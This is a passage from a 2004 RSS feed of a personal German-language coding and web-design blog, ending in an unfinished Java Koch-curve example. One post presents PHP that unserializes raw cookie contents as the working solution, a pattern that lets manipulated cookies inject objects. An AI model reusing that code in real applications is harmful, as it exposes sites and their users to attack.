  10746.    <content:encoded><![CDATA[<img src="https://blog.x-way.org/images/mozilla-bug.png" width="132" height="198" alt="Screenshot vom Bug"><p>Wie ich <a href="http://www.serve.com/apg/" title="Andrew Porter Glendinning">Andrew Porter Glendinning</a> besuchte, entdeckte ich diesen Graphikfehler in Mozilla. Der Text lautet </p><blockquote lang="en"><p>If you can read this, your browser doesn't support the over 4-year-old <a href="https://www.w3.org/TR/REC-CSS2/">CSS Level 2 Recommendation</a>. These icons should be fixed in the lower right corner of your browser window, and this message should be invisible.</p></blockquote><p>Nach der Analyse des Stylesheets, habe ich herausgefunden, dass der Text eigentlich ausserhalb des Browserfensters dargestellt werden sollte. Bei Mozilla hört das Browserfenster vor dem Scrollbalken auf, jedoch für die Rendering-Engine erst am Fensterrand :-P</p>
  10747. ]]></content:encoded>
  10748.  </item>
  10749.  
  10750.  <item>
  10751.    <title>Sicheres Programmieren mit PHP</title>
  10752.    <link>https://blog.x-way.org/Coding/2004/04/15/Sicheres_Programmieren_mit_PHP.html</link>
  10753.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324023</guid>
  10754.    <dc:creator>Andreas Jaggi</dc:creator>
  10755.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10756.    <pubDate>Thu, 15 Apr 2004 00:30:34 +0000</pubDate>
  10757.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  10758.    <description><![CDATA[<ul>
  10759. <li><a href="https://web.archive.org/web/20040603085620/http://www.zend.com/zend/art/art-oertli.php" title="Secure Programming in PHP (archive.org)">Secure Programming in PHP</a></li><li><a href="https://web.archive.org/web/20040414075634/http://solidox.org/index.php?w=module:article,action:view,id:11" title="Writing Secure PHP Code (archive.org)">Writing Secure PHP Code</a></li><li><a href="http://www.developer.com/lang/article.php/918141" title="On the Security of PHP, Part 1">On the Security of PHP, Part 1</a></li><li><a href="http://www.developer.com/lang/article.php/922871" title="On the Security of PHP, Part 2">On the Security of PHP, Part 2</a></li>
  10760. </ul><p>Uff, Glück gehabt. Die erwähnten Punkte habe ich fast alle berücksichtigt, und die ausgelassenen Sicherheitslücken funktionieren mit der hier installierten <abbr title="PHP Hypertext Preprocessor">PHP</abbr>-Version nicht mehr :-)</p><p>Via <a href="https://web.archive.org/web/20040520075516/http://www.absolut-marc.de/" title="absolut-marc.de (archive.org)">absolut-marc.de</a></p>
  10761. ]]></description>
  10762.    <content:encoded><![CDATA[<ul>
  10763. <li><a href="https://web.archive.org/web/20040603085620/http://www.zend.com/zend/art/art-oertli.php" title="Secure Programming in PHP (archive.org)">Secure Programming in PHP</a></li><li><a href="https://web.archive.org/web/20040414075634/http://solidox.org/index.php?w=module:article,action:view,id:11" title="Writing Secure PHP Code (archive.org)">Writing Secure PHP Code</a></li><li><a href="http://www.developer.com/lang/article.php/918141" title="On the Security of PHP, Part 1">On the Security of PHP, Part 1</a></li><li><a href="http://www.developer.com/lang/article.php/922871" title="On the Security of PHP, Part 2">On the Security of PHP, Part 2</a></li>
  10764. </ul><p>Uff, Glück gehabt. Die erwähnten Punkte habe ich fast alle berücksichtigt, und die ausgelassenen Sicherheitslücken funktionieren mit der hier installierten <abbr title="PHP Hypertext Preprocessor">PHP</abbr>-Version nicht mehr :-)</p><p>Via <a href="https://web.archive.org/web/20040520075516/http://www.absolut-marc.de/" title="absolut-marc.de (archive.org)">absolut-marc.de</a></p>
  10765. ]]></content:encoded>
  10766.  </item>
  10767.  
  10768.  <item>
  10769.    <title>Developing With Web Standards</title>
  10770.    <link>https://blog.x-way.org/Webdesign/2004/04/14/Developing_With_Web_Standards.html</link>
  10771.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324022</guid>
  10772.    <dc:creator>Andreas Jaggi</dc:creator>
  10773.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10774.    <pubDate>Wed, 14 Apr 2004 21:07:50 +0000</pubDate>
  10775.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  10776.    <description><![CDATA[<p><a href="http://www.456bereastreet.com/lab/developing_with_web_standards/" title="Developing With Web Standards">Developing With Web Standards</a> Recommendations and best practices. Eine gute Übersicht, auch geeignet um Leute in die Thematik einzuführen.</p><p>Via <a href="http://linkdump.de/" title="LinkDump">LinkDump</a></p>
  10777. ]]></description>
  10778.    <content:encoded><![CDATA[<p><a href="http://www.456bereastreet.com/lab/developing_with_web_standards/" title="Developing With Web Standards">Developing With Web Standards</a> Recommendations and best practices. Eine gute Übersicht, auch geeignet um Leute in die Thematik einzuführen.</p><p>Via <a href="http://linkdump.de/" title="LinkDump">LinkDump</a></p>
  10779. ]]></content:encoded>
  10780.  </item>
  10781.  
  10782.  <item>
  10783.    <title>Warum?</title>
  10784.    <link>https://blog.x-way.org/Coding/2004/04/13/Warum.html</link>
  10785.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324021</guid>
  10786.    <dc:creator>Andreas Jaggi</dc:creator>
  10787.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10788.    <pubDate>Tue, 13 Apr 2004 18:36:15 +0000</pubDate>
  10789.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  10790.    <description><![CDATA[<p>Kann mir jemand den Gedanken hinter folgendem Verhalten von <a href="http://pear.php.net/package/XML_RPC" title="PEAR :: Package :: XML_RPC">XML_RPC</a> erklären?</p><p>Ich bin dabei, einige <abbr title="eXtensible Markup Language - Remote Procedure Call protocol">XML-RPC</abbr> Webservices in <abbr title="PHP Hypertext Preprocessor">PHP</abbr> zu programmieren. Leider gabs immer eine Fehlermeldung wenn ich eine bestimmte Funktion aufrufe.</p><p>Zuerst suchte ich den Fehler in der Funktion beim XML-RPC-Server. Jedoch funktionierte die problemlos. Danach habe ich eine Ewigkeit mit den via XML-RPC übergebenen Parameter herumgespielt, hat jedoch nichts gebracht.</p><p>Dann habe ich in der XML-RPC-Klasse das Debug-Flag aktiviert. So konnte ich herausfinden, dass der XML-RPC-Server die Ausgabewerte der Funktionen übergibt, was ja auch so sein muss. Das Debug-Flag machte auch, dass im XML-RPC-Client die empfangenen XML-Daten ausgegeben werden. Diese entsprachen den vom Server gesendeten. Doch leider gab mir das Debug-Flag keine Information warum das Parsen der XML-Daten fehlschlug.</p><p>So habe ich mir mal den Code der XML-RPC-Klasse angeschaut und habe dort eine Funktion error_log entdeckt. Diese Funktion ist in PHP eingebaut und sendet eine Fehlermeldung. Nach dem Studium der <a href="https://www.php.net/manual/de/function.error-log.php" title="PHP-Manual: error_log">Dokumentation</a> habe ich herausgefunden, dass die Fehlermeldungen damit in den Error-Log vom Apache geschrieben werden!</p><p>Also habe ich mir /var/log/apache2/error_log vorgenommen. Darin fand ich Fehlermeldungen des XML-Parsers, der sich über ein invalid token beschwerte!</p><p> Nach längerem Herumexperimentieren mit den Eingabewerten, fand ich heraus, dass der XML-Parser an einem nicht enkodierten Umlaut scheiterte.</p><p>Da ich Umlaute nicht mehr enkodiere, sondern einfach das entsprechende encoding="iso-8859-15" Attribut setzte, kontrollierte ich zuerst den XML-Header, wie er von der XML-RPC-Klasse generiert wird. Dort fand ich dann auch den Fehler: es wird kein encoding Attribut erzeugt.</p><p>Warum werden nicht alle Umlaute etc. automatisch enkodiert, wenn kein encoding Attribut mitgeliefert wird?</p><p>Warum gibt es ein Debug-Flag, aber Fehlermeldungen werden trotzdem nicht ausgegeben sondern weiterhin nur nach /var/log/apache2/error_log geschrieben?</p>
  10791. ]]></description>
  10792.    <content:encoded><![CDATA[<p>Kann mir jemand den Gedanken hinter folgendem Verhalten von <a href="http://pear.php.net/package/XML_RPC" title="PEAR :: Package :: XML_RPC">XML_RPC</a> erklären?</p><p>Ich bin dabei, einige <abbr title="eXtensible Markup Language - Remote Procedure Call protocol">XML-RPC</abbr> Webservices in <abbr title="PHP Hypertext Preprocessor">PHP</abbr> zu programmieren. Leider gabs immer eine Fehlermeldung wenn ich eine bestimmte Funktion aufrufe.</p><p>Zuerst suchte ich den Fehler in der Funktion beim XML-RPC-Server. Jedoch funktionierte die problemlos. Danach habe ich eine Ewigkeit mit den via XML-RPC übergebenen Parameter herumgespielt, hat jedoch nichts gebracht.</p><p>Dann habe ich in der XML-RPC-Klasse das Debug-Flag aktiviert. So konnte ich herausfinden, dass der XML-RPC-Server die Ausgabewerte der Funktionen übergibt, was ja auch so sein muss. Das Debug-Flag machte auch, dass im XML-RPC-Client die empfangenen XML-Daten ausgegeben werden. Diese entsprachen den vom Server gesendeten. Doch leider gab mir das Debug-Flag keine Information warum das Parsen der XML-Daten fehlschlug.</p><p>So habe ich mir mal den Code der XML-RPC-Klasse angeschaut und habe dort eine Funktion error_log entdeckt. Diese Funktion ist in PHP eingebaut und sendet eine Fehlermeldung. Nach dem Studium der <a href="https://www.php.net/manual/de/function.error-log.php" title="PHP-Manual: error_log">Dokumentation</a> habe ich herausgefunden, dass die Fehlermeldungen damit in den Error-Log vom Apache geschrieben werden!</p><p>Also habe ich mir /var/log/apache2/error_log vorgenommen. Darin fand ich Fehlermeldungen des XML-Parsers, der sich über ein invalid token beschwerte!</p><p> Nach längerem Herumexperimentieren mit den Eingabewerten, fand ich heraus, dass der XML-Parser an einem nicht enkodierten Umlaut scheiterte.</p><p>Da ich Umlaute nicht mehr enkodiere, sondern einfach das entsprechende encoding="iso-8859-15" Attribut setzte, kontrollierte ich zuerst den XML-Header, wie er von der XML-RPC-Klasse generiert wird. Dort fand ich dann auch den Fehler: es wird kein encoding Attribut erzeugt.</p><p>Warum werden nicht alle Umlaute etc. automatisch enkodiert, wenn kein encoding Attribut mitgeliefert wird?</p><p>Warum gibt es ein Debug-Flag, aber Fehlermeldungen werden trotzdem nicht ausgegeben sondern weiterhin nur nach /var/log/apache2/error_log geschrieben?</p>
  10793. ]]></content:encoded>
  10794.  </item>
  10795.  
  10796.  <item>
  10797.    <title>RSS, TrackBack</title>
  10798.    <link>https://blog.x-way.org/Coding/2004/04/11/RSS_TrackBack.html</link>
  10799.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324020</guid>
  10800.    <dc:creator>Andreas Jaggi</dc:creator>
  10801.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10802.    <pubDate>Sun, 11 Apr 2004 15:51:14 +0000</pubDate>
  10803.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  10804.    <description><![CDATA[<p>Nun findet man hier auch diverse <abbr title="Rich Site Summary | RDF Site Summary | Really Simple Syndication">RSS</abbr>-Feeds und es ist auch möglich mittels TrackBack seine Meinung mitzuteilen.</p>                                                                                                                                                        <ul><li><a href="https://web.archive.org/web/20040402132105/http://uckan.info/texte/was_ist_rss.php" title="Was ist RSS? (archive.org)">Was ist RSS?</a></li><li><a href="https://web.archive.org/web/20040402132332/www.moveabletype.org/trackback/" title="TrackBack Development (archive.org)">TrackBack Development</a></li></ul>
  10805. <p>Feeds</p>
  10806. <ul><li>Alle Sprachen<ul>
  10807. <li><a href="http://waterwave.ch/weblog/atom.xml" title="Atom Feed">Atom 0.3</a></li>
  10808. <li><a href="http://waterwave.ch/weblog/rss.xml" title="RSS2 Feed">RSS 2.0</a></li>
  10809. <li><a href="http://waterwave.ch/weblog/rss-092.xml" title="RSS 0.92 Feed">RSS 0.92</a></li>
  10810. <li><a href="http://waterwave.ch/weblog/rdf.xml" title="RSS 1.0 Feed">RSS 1.0</a></li>
  10811. </ul></li><li>Deutsch<ul>
  10812. <li><a href="http://waterwave.ch/weblog/atom-de.xml" title="Atom Feed">Atom 0.3</a></li>
  10813. <li><a href="http://waterwave.ch/weblog/rss-de.xml" title="RSS2 Feed">RSS 2.0</a></li>
  10814. <li><a href="http://waterwave.ch/weblog/rss-092-de.xml" title="RSS 0.92 Feed">RSS 0.92</a></li>
  10815. <li><a href="http://waterwave.ch/weblog/rdf-de.xml" title="RSS 1.0 Feed">RSS 1.0</a></li>
  10816. </ul></li><li>Französisch<ul>
  10817. <li><a href="http://waterwave.ch/weblog/atom-fr.xml" title="Atom Feed">Atom 0.3</a></li>
  10818. <li><a href="http://waterwave.ch/weblog/rss-fr.xml" title="RSS2 Feed">RSS 2.0</a></li>
  10819. <li><a href="http://waterwave.ch/weblog/rss-092-fr.xml" title="RSS 0.92 Feed">RSS 0.92</a></li>
  10820. <li><a href="http://waterwave.ch/weblog/rdf-fr.xml" title="RSS 1.0 Feed">RSS 1.0</a></li>
  10821. </ul></li></ul>
  10822. ]]></description>
  10823.    <content:encoded><![CDATA[<p>Nun findet man hier auch diverse <abbr title="Rich Site Summary | RDF Site Summary | Really Simple Syndication">RSS</abbr>-Feeds und es ist auch möglich mittels TrackBack seine Meinung mitzuteilen.</p>                                                                                                                                                        <ul><li><a href="https://web.archive.org/web/20040402132105/http://uckan.info/texte/was_ist_rss.php" title="Was ist RSS? (archive.org)">Was ist RSS?</a></li><li><a href="https://web.archive.org/web/20040402132332/www.moveabletype.org/trackback/" title="TrackBack Development (archive.org)">TrackBack Development</a></li></ul>
  10824. <p>Feeds</p>
  10825. <ul><li>Alle Sprachen<ul>
  10826. <li><a href="http://waterwave.ch/weblog/atom.xml" title="Atom Feed">Atom 0.3</a></li>
  10827. <li><a href="http://waterwave.ch/weblog/rss.xml" title="RSS2 Feed">RSS 2.0</a></li>
  10828. <li><a href="http://waterwave.ch/weblog/rss-092.xml" title="RSS 0.92 Feed">RSS 0.92</a></li>
  10829. <li><a href="http://waterwave.ch/weblog/rdf.xml" title="RSS 1.0 Feed">RSS 1.0</a></li>
  10830. </ul></li><li>Deutsch<ul>
  10831. <li><a href="http://waterwave.ch/weblog/atom-de.xml" title="Atom Feed">Atom 0.3</a></li>
  10832. <li><a href="http://waterwave.ch/weblog/rss-de.xml" title="RSS2 Feed">RSS 2.0</a></li>
  10833. <li><a href="http://waterwave.ch/weblog/rss-092-de.xml" title="RSS 0.92 Feed">RSS 0.92</a></li>
  10834. <li><a href="http://waterwave.ch/weblog/rdf-de.xml" title="RSS 1.0 Feed">RSS 1.0</a></li>
  10835. </ul></li><li>Französisch<ul>
  10836. <li><a href="http://waterwave.ch/weblog/atom-fr.xml" title="Atom Feed">Atom 0.3</a></li>
  10837. <li><a href="http://waterwave.ch/weblog/rss-fr.xml" title="RSS2 Feed">RSS 2.0</a></li>
  10838. <li><a href="http://waterwave.ch/weblog/rss-092-fr.xml" title="RSS 0.92 Feed">RSS 0.92</a></li>
  10839. <li><a href="http://waterwave.ch/weblog/rdf-fr.xml" title="RSS 1.0 Feed">RSS 1.0</a></li>
  10840. </ul></li></ul>
  10841. ]]></content:encoded>
  10842.  </item>
  10843.  
  10844.  <item>
  10845.    <title>Inkscape</title>
  10846.    <link>https://blog.x-way.org/Webdesign/2004/04/09/Inkscape.html</link>
  10847.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324019</guid>
  10848.    <dc:creator>Andreas Jaggi</dc:creator>
  10849.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10850.    <pubDate>Fri, 09 Apr 2004 21:22:13 +0000</pubDate>
  10851.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  10852.    <description><![CDATA[<p>Gestern habe ich <a href="https://inkscape.org/" title="Inkscape">Inkscape</a> entdeckt. Inkscape ist ein Vektor-Graphikprogramm, das <a href="https://www.w3.org/Graphics/SVG/" title="SVG beim W3C"><abbr title="Scalable Vector Graphics">SVG</abbr></a> als Dateiformat benutzt.</p><p>Das Programm lässt sich mit <a href="https://en.wikipedia.org/wiki/Adobe_Fireworks" title="Macromedia Fireworks">Macromedia Fireworks</a> vergleichen, wennauch der Funktionsumfang noch nicht ganz so gross ist. So kann Inkscape nur nach <abbr title="Portable Network Graphics">PNG</abbr> exportieren und unterstützt keine Animationen. Dafür ist IMHO die Vektorbearbeitung von Inkscape schon jetzt der von Fireworks überlegen.</p><p>Nachdem ich auch das Tutorial gemacht habe, durfte ich feststellen, dass das Userinterface von Inkscape grösstenteils absolut top ist. So eine angenehme und einfache Handhabung habe ich bei einem Graphikprogramm bisher vergebens gesucht. Da kann selbst mein bisheriger Favorit Fireworks fast nicht mithalten.</p><ul><li><a href="https://inkscape.org/about/screenshots/" title="Screenshots von Inkscape">Screenshots</a></li><li><a href="https://blog.x-way.org/images/inkscape-tutorial.svg" title="Default Tutorial (SVG)">Default Tutorial</a></li><li><a href="https://web.archive.org/web/20040604063741/http://programmer-art.org/?page=inkscape" title="Inkscape Tutorials (archive.org)">Inkscape Tutorials</a></li></ul>
  10853. ]]></description>
  10854.    <content:encoded><![CDATA[<p>Gestern habe ich <a href="https://inkscape.org/" title="Inkscape">Inkscape</a> entdeckt. Inkscape ist ein Vektor-Graphikprogramm, das <a href="https://www.w3.org/Graphics/SVG/" title="SVG beim W3C"><abbr title="Scalable Vector Graphics">SVG</abbr></a> als Dateiformat benutzt.</p><p>Das Programm lässt sich mit <a href="https://en.wikipedia.org/wiki/Adobe_Fireworks" title="Macromedia Fireworks">Macromedia Fireworks</a> vergleichen, wennauch der Funktionsumfang noch nicht ganz so gross ist. So kann Inkscape nur nach <abbr title="Portable Network Graphics">PNG</abbr> exportieren und unterstützt keine Animationen. Dafür ist IMHO die Vektorbearbeitung von Inkscape schon jetzt der von Fireworks überlegen.</p><p>Nachdem ich auch das Tutorial gemacht habe, durfte ich feststellen, dass das Userinterface von Inkscape grösstenteils absolut top ist. So eine angenehme und einfache Handhabung habe ich bei einem Graphikprogramm bisher vergebens gesucht. Da kann selbst mein bisheriger Favorit Fireworks fast nicht mithalten.</p><ul><li><a href="https://inkscape.org/about/screenshots/" title="Screenshots von Inkscape">Screenshots</a></li><li><a href="https://blog.x-way.org/images/inkscape-tutorial.svg" title="Default Tutorial (SVG)">Default Tutorial</a></li><li><a href="https://web.archive.org/web/20040604063741/http://programmer-art.org/?page=inkscape" title="Inkscape Tutorials (archive.org)">Inkscape Tutorials</a></li></ul>
  10855. ]]></content:encoded>
  10856.  </item>
  10857.  
  10858.  <item>
  10859.    <title>x-log v2.02c</title>
  10860.    <link>https://blog.x-way.org/Coding/2004/04/08/x-log_v202c.html</link>
  10861.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324018</guid>
  10862.    <dc:creator>Andreas Jaggi</dc:creator>
  10863.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10864.    <pubDate>Thu, 08 Apr 2004 22:07:57 +0000</pubDate>
  10865.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  10866.    <description><![CDATA[<p>So, nun sind auch die Erweiterungen, welche ich während der letzten Woche offline geschrieben habe, mehr oder weniger erfolgreich integriert.</p><p>Erwähnenswerte neue Features:</p><ul><li>Labels, einzelne Einträge sind nun nicht mehr nur via <a href="http://waterwave.ch/weblog/detail.php?id=324018" title="x-log v2.02c">detail.php?id=324018</a> erreichbar sondern auch via <a href="http://waterwave.ch/weblog/detail.php?label=x-log_v202c" title="x-log v2.02c">detail.php?label=x-log_v202c</a></li> <li>Archiv, wie schon gehabt</li><li>mod_rewrite für einzele Einträge, dieser Eintrag ist auch erreichbar via <a href="http://waterwave.ch/weblog/324018" title="x-log v2.02c">http://waterwave.ch/weblog/324018</a> und <a href="http://waterwave.ch/weblog/x-log_v202c" title="x-log v2.02c">http://waterwave.ch/weblog/x-log_v202c</a></li><li>mod_rewrite fürs Archiv, <a href="http://waterwave.ch/weblog/archiv.php?jahr=2004" title="2004">archiv.php?jahr=2004</a> ist auch erreichbar via <a href="http://waterwave.ch/weblog/2004" title="2004">http://waterwave.ch/weblog/2004</a> und infolge der Verschachtelung von Catch-All-Expressions auch via <a href="http://www.waterwave.ch/weblog/2004/2003/0/0/9876/1234/2003/1/2/2004" title="2004">http://www.waterwave.ch/weblog/2004/2003/0/0/9876/1234/2003/1/2/2004</a></li><li><abbr title="Extensible Hypertext Markup Language">XHTML</abbr> 1.0 Strict mit korrektem <abbr title="Multipurpose Internet Mail Extensions">MIME</abbr>-Type (application/xhtml+xml, falls vom Browser unterstützt) für alle Einträge seit Jahresbeginn (mal schauen wie lange das so bleibt ;-)</li></ul>
  10867. ]]></description>
  10868.    <content:encoded><![CDATA[<p>So, nun sind auch die Erweiterungen, welche ich während der letzten Woche offline geschrieben habe, mehr oder weniger erfolgreich integriert.</p><p>Erwähnenswerte neue Features:</p><ul><li>Labels, einzelne Einträge sind nun nicht mehr nur via <a href="http://waterwave.ch/weblog/detail.php?id=324018" title="x-log v2.02c">detail.php?id=324018</a> erreichbar sondern auch via <a href="http://waterwave.ch/weblog/detail.php?label=x-log_v202c" title="x-log v2.02c">detail.php?label=x-log_v202c</a></li> <li>Archiv, wie schon gehabt</li><li>mod_rewrite für einzele Einträge, dieser Eintrag ist auch erreichbar via <a href="http://waterwave.ch/weblog/324018" title="x-log v2.02c">http://waterwave.ch/weblog/324018</a> und <a href="http://waterwave.ch/weblog/x-log_v202c" title="x-log v2.02c">http://waterwave.ch/weblog/x-log_v202c</a></li><li>mod_rewrite fürs Archiv, <a href="http://waterwave.ch/weblog/archiv.php?jahr=2004" title="2004">archiv.php?jahr=2004</a> ist auch erreichbar via <a href="http://waterwave.ch/weblog/2004" title="2004">http://waterwave.ch/weblog/2004</a> und infolge der Verschachtelung von Catch-All-Expressions auch via <a href="http://www.waterwave.ch/weblog/2004/2003/0/0/9876/1234/2003/1/2/2004" title="2004">http://www.waterwave.ch/weblog/2004/2003/0/0/9876/1234/2003/1/2/2004</a></li><li><abbr title="Extensible Hypertext Markup Language">XHTML</abbr> 1.0 Strict mit korrektem <abbr title="Multipurpose Internet Mail Extensions">MIME</abbr>-Type (application/xhtml+xml, falls vom Browser unterstützt) für alle Einträge seit Jahresbeginn (mal schauen wie lange das so bleibt ;-)</li></ul>
  10869. ]]></content:encoded>
  10870.  </item>
  10871.  
  10872.  <item>
  10873.    <title>Jouyeux Anniversaire Satellite</title>
  10874.    <link>https://blog.x-way.org/Music/2004/04/08/Jouyeux_Anniversaire_Satellite.html</link>
  10875.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324017</guid>
  10876.    <dc:creator>Andreas Jaggi</dc:creator>
  10877.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10878.    <pubDate>Thu, 08 Apr 2004 15:44:19 +0000</pubDate>
  10879.    <category domain="https://blog.x-way.org/Music">Music</category>
  10880.    <description><![CDATA[<p>La semaine dernière j'ai passé presque tous les jours, soirs et nuits au <a href="http://sat.epfl.ch" title="Satellite">Satellite</a> . Il y avait la fête de <a href="http://sat.epfl.ch/special/0304/20ans/" title="Satellite - 20 ans">20 ans de Satellite</a>. Et puis le weekend il y avait des concerts vachement génials.</p>
  10881. ]]></description>
  10882.    <content:encoded><![CDATA[<p>La semaine dernière j'ai passé presque tous les jours, soirs et nuits au <a href="http://sat.epfl.ch" title="Satellite">Satellite</a> . Il y avait la fête de <a href="http://sat.epfl.ch/special/0304/20ans/" title="Satellite - 20 ans">20 ans de Satellite</a>. Et puis le weekend il y avait des concerts vachement génials.</p>
  10883. ]]></content:encoded>
  10884.  </item>
  10885.  
  10886.  <item>
  10887.    <title>Neue alte Features</title>
  10888.    <link>https://blog.x-way.org/Coding/2004/03/28/Neue_alte_Features.html</link>
  10889.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324016</guid>
  10890.    <dc:creator>Andreas Jaggi</dc:creator>
  10891.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10892.    <pubDate>Sun, 28 Mar 2004 01:18:46 +0000</pubDate>
  10893.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  10894.    <description><![CDATA[<p>Nun sind wieder ein paar alte Features zum Vorschein gekommen :-)</p><p>Dabei hat mir <abbr title="PHP Hypertext Preprocessor">PHP</abbr> den Weg nicht gerade leicht gemacht. Angenommen, man will ein Array in einem Cookie speichern indem man serialize() und unserialize() benutzt, könnte folgender Code entstehen.</p><pre>function saveData ( $data ) {
  10895.        setcookie('cookiename', serialize($data), time()+3600*24*100);
  10896. }
  10897.  
  10898. function loadData () {
  10899.        return unserialize($_COOKIE['cookiename']);
  10900. }</pre><p>Das funktioniert aber leider nicht. Damit es funktioniert muss noch stripslashes() benutzt werden.</p><pre>function saveData ( $data ) {
  10901.        setcookie('cookiename', serialize($data), time()+3600*24*100);
  10902. }
  10903.  
  10904. function loadData () {
  10905.        return unserialize(stripslashes($_COOKIE['cookiename']));
  10906. }</pre>
  10907. ]]></description>
  10908.    <content:encoded><![CDATA[<p>Nun sind wieder ein paar alte Features zum Vorschein gekommen :-)</p><p>Dabei hat mir <abbr title="PHP Hypertext Preprocessor">PHP</abbr> den Weg nicht gerade leicht gemacht. Angenommen, man will ein Array in einem Cookie speichern indem man serialize() und unserialize() benutzt, könnte folgender Code entstehen.</p><pre>function saveData ( $data ) {
  10909.        setcookie('cookiename', serialize($data), time()+3600*24*100);
  10910. }
  10911.  
  10912. function loadData () {
  10913.        return unserialize($_COOKIE['cookiename']);
  10914. }</pre><p>Das funktioniert aber leider nicht. Damit es funktioniert muss noch stripslashes() benutzt werden.</p><pre>function saveData ( $data ) {
  10915.        setcookie('cookiename', serialize($data), time()+3600*24*100);
  10916. }
  10917.  
  10918. function loadData () {
  10919.        return unserialize(stripslashes($_COOKIE['cookiename']));
  10920. }</pre>
  10921. ]]></content:encoded>
  10922.  </item>
  10923.  
  10924.  <item>
  10925.    <title>Paris en nuit</title>
  10926.    <link>https://blog.x-way.org/Misc/2004/03/27/Paris_en_nuit.html</link>
  10927.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324015</guid>
  10928.    <dc:creator>Andreas Jaggi</dc:creator>
  10929.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10930.    <pubDate>Sat, 27 Mar 2004 21:45:26 +0000</pubDate>
  10931.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  10932.    <description><![CDATA[Chez <a href="http://www.vowe.net" title="vowe.net">vowe.net</a> j'ai trouvé cette <a href="https://blog.x-way.org/images/parisbynight.jpg" title="parisbynight.jpg (1.8 MO)">image exceptionelle</a> de Paris.
  10933. ]]></description>
  10934.    <content:encoded><![CDATA[Chez <a href="http://www.vowe.net" title="vowe.net">vowe.net</a> j'ai trouvé cette <a href="https://blog.x-way.org/images/parisbynight.jpg" title="parisbynight.jpg (1.8 MO)">image exceptionelle</a> de Paris.
  10935. ]]></content:encoded>
  10936.  </item>
  10937.  
  10938.  <item>
  10939.    <title>Kochsche Kurve</title>
  10940.    <link>https://blog.x-way.org/Coding/2004/03/26/Kochsche_Kurve.html</link>
  10941.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324014</guid>
  10942.    <dc:creator>Andreas Jaggi</dc:creator>
  10943.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10944.    <pubDate>Fri, 26 Mar 2004 23:18:02 +0000</pubDate>
  10945.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  10946.    <description><![CDATA[<p>Heute haben wir im <abbr title="A general purpose, high-level, object-oriented, cross-platform programming language developed by Sun Microsystems">Java</abbr>-Programmieren mit <abbr title="Graphical User Interface">GUI</abbr>-Programmierung angefangen. Die Exercices waren simpel (Buttons erzeugen, ausrichten etc.), jedoch hatte es als Zusatzaufgabe noch die <a href="https://web.archive.org/web/20040815192152/http://cowww.epfl.ch/proginfo/TP/gra1/serie3_files/Koch.htm" title="Beschreibung auf französisch (archive.org)">Kochsche Kurve</a>.</p><p><img src="https://blog.x-way.org/images/kochschekurve.png" width="422" height="472" alt="Kochsche Kurve"></p>
  10947. <br><br>
  10948. <pre>import java.awt.*;
  10949. import java.awt.event.*;
  10950. import javax.swing.*;
  10951.  
  10952. /**
  10953. *  Kochsche Kurve
  10954. *
  10955. * @author     Andreas Jaggi
  10956. * @created    26. März 2004
  10957. * @version    1.0
  10958. */
  10959.  
  10960. public class KochscheKurve
  10961.                 extends JFrame {
  10962.        /**
  10963.         *  Constructor for the KochscheKurve object
  10964.         */
  10965.        public KochscheKurve() {
  10966.                setSize( 600, 600 );
  10967.                setTitle( "Die Kochsche Kurve" );
  10968.        }
  10969.  
  10970.  
  10971.        /**
  10972.         *  Überladene "interne" Methode, die aufgerufen wird, wenn das Fenster neu
  10973.         *  gezeichnet werden muss
  10974.         *
  10975.         * @param  g  Graphik-Objekt, auf dem gezeichnet wird
  10976.         */
  10977.        public void paint( Graphics g ) {
  10978.                super.paint( g );
  10979.  
  10980.                double  x1;
  10981.                double  x2;
  10982.                double  x3;
  10983.                double  y1;
  10984.                double  y2;
  10985.                double  y3;
  10986.                int     depth  = 13;
  10987.  
  10988.                x1 = 100;
  10989.                y1 = 400;
  10990.                x2 = 500;
  10991.                y2 = 400;
  10992.                x3 = ( x2 - x1 ) * Math.cos( -Math.PI / 3 ) -
  10993.                                ( y2 - y1 ) * Math.sin( -Math.PI / 3 ) + x1;
  10994.                y3 = ( x2 - x1 ) * Math.sin( -Math.PI / 3 ) +
  10995.                                ( y2 - y1 ) * Math.cos( -Math.PI / 3 ) + y1;
  10996.  
  10997.                koch( g, depth, x2, y2, x1, y1 );
  10998.                koch( g, depth, x1, y1, x3, y3 );
  10999.                koch( g, depth, x3, y3, x2, y2 );
  11000.        }
  11001.  
  11002.  
  11003.        /**
  11004.         *  Rekursive Funktion, welche den Fraktal zwischen zwei Punkten bis zu einer
  11005.         *  bestimmten Tiefe zeichnet.
  11006.         *
